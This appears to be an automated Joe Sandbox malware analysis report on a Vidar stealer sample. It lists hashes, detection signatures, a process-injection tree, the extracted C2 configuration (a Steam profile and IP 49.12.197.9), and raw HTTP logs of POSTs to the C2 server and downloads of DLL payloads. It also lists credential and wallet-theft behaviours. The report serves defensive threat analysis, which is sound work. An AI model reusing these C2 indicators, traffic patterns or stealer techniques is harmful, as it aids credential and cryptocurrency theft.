Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1524661
MD5:37ec6ac7a655216941a30dc46fe1b189
SHA1:cf6637aabee2fd26a76e30db0a289201305372fb
SHA256:677862ec62130345467fc6472bfbeff124fd2716897db3f8549c29f016ef13cd
Tags:exeuser-Bitsight
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2960 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 37EC6AC7A655216941A30DC46FE1B189)
    • conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 5576 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "bb7310eab4245006f125c442da2d1e50"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
              00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 8 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.2.file.exe.6e820000.6.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  0.2.file.exe.6e820000.6.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                    0.2.file.exe.6e820000.6.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      0.2.file.exe.6e820000.6.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                        3.2.aspnet_regiis.exe.400000.1.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                          Click to see the 5 entries

                          Sigma Signatures

                          No Sigma rule has matched

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T03:35:53.721399+020020287653Unknown Traffic192.168.2.64972249.12.197.9443TCP
                          2024-10-03T03:35:54.941629+020020287653Unknown Traffic192.168.2.64972349.12.197.9443TCP
                          2024-10-03T03:35:56.366413+020020287653Unknown Traffic192.168.2.64972449.12.197.9443TCP
                          2024-10-03T03:35:57.730654+020020287653Unknown Traffic192.168.2.64972549.12.197.9443TCP
                          2024-10-03T03:35:59.102733+020020287653Unknown Traffic192.168.2.64972649.12.197.9443TCP
                          2024-10-03T03:36:00.559955+020020287653Unknown Traffic192.168.2.64972749.12.197.9443TCP
                          2024-10-03T03:36:01.905602+020020287653Unknown Traffic192.168.2.64972849.12.197.9443TCP
                          2024-10-03T03:36:04.977333+020020287653Unknown Traffic192.168.2.64972949.12.197.9443TCP
                          2024-10-03T03:36:06.117394+020020287653Unknown Traffic192.168.2.64973049.12.197.9443TCP
                          2024-10-03T03:36:07.390575+020020287653Unknown Traffic192.168.2.64973149.12.197.9443TCP
                          2024-10-03T03:36:08.845534+020020287653Unknown Traffic192.168.2.64973249.12.197.9443TCP
                          2024-10-03T03:36:10.824936+020020287653Unknown Traffic192.168.2.64973349.12.197.9443TCP
                          2024-10-03T03:36:12.845715+020020287653Unknown Traffic192.168.2.64973549.12.197.9443TCP
                          2024-10-03T03:36:14.763414+020020287653Unknown Traffic192.168.2.64973649.12.197.9443TCP
                          2024-10-03T03:36:16.183576+020020287653Unknown Traffic192.168.2.64973749.12.197.9443TCP
                          2024-10-03T03:36:17.668662+020020287653Unknown Traffic192.168.2.64973849.12.197.9443TCP
                          2024-10-03T03:36:20.838688+020020287653Unknown Traffic192.168.2.64973949.12.197.9443TCP
                          2024-10-03T03:36:22.146206+020020287653Unknown Traffic192.168.2.64974049.12.197.9443TCP
                          2024-10-03T03:36:23.489607+020020287653Unknown Traffic192.168.2.64974149.12.197.9443TCP
                          2024-10-03T03:36:25.031403+020020287653Unknown Traffic192.168.2.64974349.12.197.9443TCP
                          2024-10-03T03:36:27.088335+020020287653Unknown Traffic192.168.2.64974449.12.197.9443TCP
                          2024-10-03T03:36:28.988557+020020287653Unknown Traffic192.168.2.64974549.12.197.9443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T03:35:58.429229+020020442471Malware Command and Control Activity Detected49.12.197.9443192.168.2.649725TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T03:35:59.801644+020020518311Malware Command and Control Activity Detected49.12.197.9443192.168.2.649726TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T03:35:58.429123+020020490871A Network Trojan was detected192.168.2.64972549.12.197.9443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T03:36:30.410110+020028032702Potentially Bad Traffic192.168.2.649746147.45.44.10480TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Found malware configuration
                          Source: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "bb7310eab4245006f125c442da2d1e50"}
                          Multi AV Scanner detection for domain / URL
                          Source: https://49.12.197.9/NVirustotal: Detection: 9%Perma Link
                          Source: https://49.12.197.9/Virustotal: Detection: 10%Perma Link
                          Source: https://49.12.197.9/sqlp.dllVirustotal: Detection: 11%Perma Link
                          Source: https://49.12.197.9Virustotal: Detection: 10%Perma Link
                          Multi AV Scanner detection for submitted file
                          Source: file.exeReversingLabs: Detection: 21%
                          Source: file.exeVirustotal: Detection: 30%Perma Link
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Machine Learning detection for dropped file
                          Source: C:\Users\user\AppData\Roaming\msvcp110.dllJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: file.exeJoe Sandbox ML: detected
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,3_2_004080A1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,3_2_00408048
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,3_2_00411E5D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,3_2_0040A7D8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7A6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,3_2_6C7A6C80
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49721 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.6:49722 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.6:49729 version: TLS 1.2
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                          Source: Binary string: freebl3.pdb source: aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: freebl3.pdbp source: aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3403233819.000000006C9CF000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
                          Source: Binary string: softokn3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.3394302971.000000003A330000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.3389107122.000000002E456000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
                          Source: Binary string: nss3.pdb source: aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3403233819.000000006C9CF000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
                          Source: Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmp
                          Source: Binary string: softokn3.pdb source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E8120ED FindFirstFileExW,0_2_6E8120ED
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,3_2_0041543D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,3_2_00414CC8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00409D1C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040D5C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_0040B5DF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00401D80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_0040BF4D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00415FD1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040B93F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,3_2_00415B0B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,3_2_0040CD37
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,3_2_00415142
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]3_2_004014AD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax3_2_004014AD

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.6:49725 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.6:49725
                          Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.6:49726
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199780418869
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                          Source: Joe Sandbox ViewIP Address: 49.12.197.9 49.12.197.9
                          Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                          Source: Joe Sandbox ViewIP Address: 147.45.44.104 147.45.44.104
                          Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                          Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                          Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49725 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49723 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49727 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49726 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49722 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49728 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49724 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49729 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49732 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49733 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49731 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49730 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49735 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49736 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49737 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49738 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49741 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49745 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49743 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49739 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49744 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49740 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49746 -> 147.45.44.104:80
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDAFCAFCBKECBGCFIIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 255Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBAAFHDHCBGCAKFHDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFHIJDHDGDBFHIEHDGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDBAKKJKKECGDGCAECAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 6069Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGCBGCAFIIECBFIDHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEHCFCBKKJDGCAKFCFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
